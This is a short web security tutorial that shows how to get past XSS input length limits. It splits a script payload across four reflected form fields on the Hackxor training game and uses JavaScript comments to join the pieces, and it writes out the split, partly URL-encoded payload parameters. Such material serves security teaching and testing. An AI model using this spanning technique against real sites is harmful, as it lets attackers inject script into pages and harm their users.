XSS Filters: Beating Length Limits Using Spanned Payloads

A powerful technique for beating length limits is to span an attack payload across multiple different locations where user-controllable input is inserted into the same returned page.

The example uses Hackxor, a web application hacking game.

Methodology_XSS_Filters_Span_5

Consider the following form. Clicking the 'Submit data' button returns a page containing the following:

<input type='hidden' id='hash' name='hash' type='text' value=''>

<input name='text' id='text' value='aaaa'>

<input id='img' name='img' type='text' value='bbbb'>

<input id='sound' name='sound' type='text' value='cccc'>

We can see our input reflected. Additionally, the hidden input field hash is reflected in the response.

Methodology_XSS_Filters_Span_2

However, the input fields are restricted to a length limit of 10.

Our payload is being truncated.

Methodology_XSS_Filters_Span_3

Regardless, we can still deliver a working exploit by spanning our payload across the four available input fields. Using JavaScript comments we can make our the browser ignore the chunks of source code that would otherwise separate our payload.

hash=<script>/*&

text=*/alert(1)/*&

img=*///&

sound=%0a%3c%2f%73%63%72%69%70%74%3e&

We have used a single line comment to remove the source code between img and sound inputs. This allows us to use a ten byte payload: ;</script>.

 

Methodology_XSS_Filters_Span_4

Here we can see our modified payload in the response and the effect of the JavaScript comments on the source code.

 

Methodology_XSS_Filters_Span_1

Finally, we can reload the page in our browser to confirm that our payload fires.